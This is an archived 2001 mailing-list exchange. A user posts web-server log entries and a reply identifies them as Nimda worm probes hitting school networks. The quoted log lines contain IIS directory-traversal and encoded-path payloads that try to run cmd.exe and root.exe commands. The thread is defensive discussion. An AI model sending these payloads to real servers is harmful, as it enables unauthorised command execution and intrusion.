Re: [SLUG] WHAT is THIS?

From: Russell Hires (rhires@earthlink.net)
Date: Mon Oct 01 2001 - 23:01:57 EDT

I'm thinking this is Nimda. I saw this sort of error message on a Mac
server log file. It had a few other things with it, too, though this log
doesn't show it. This is why Nimda is bad for the internet as a whole:
it probes everything, on port 80 in this case, but I had a sys admin at
the Pasco County School District tell me that he had printers and
various other "net-enabled" devices telling him that they wanted to pass
on this "information" or that they had a port 80. Fortunately, I saw
this on a Mac server, and thought, hmph, that's interesting. The High
School (Wesley Chapel) next door (which runs a Windows network) was
trying to infect us (a Middle School -- Weightman). Also fortunately, it
generated a lot bad karma for those sys admins at various schools
throughout Pasco Co. Schools that run Windows...

Russell

Patrick Grantham wrote:
>
> Snipped from my httpd log file: The log file is littered with them from IPs
> that appear to be all over the world. Any ideas? I am thankful I am
> running linux, which would account for 404 errors.
>
> 24.95.6.159 - - [01/Oct/2001:22:05:23 -0400] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 293
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 291
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
> 24.95.175.59 - - [01/Oct/2001:22:24:37 -0400] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.95.175.59 - - [01/Oct/2001:22:24:37 -0400] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 332
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 332
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 348
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315

This archive was generated by hypermail 2.1.3 : Fri Aug 01 2014 - 20:36:10 EDT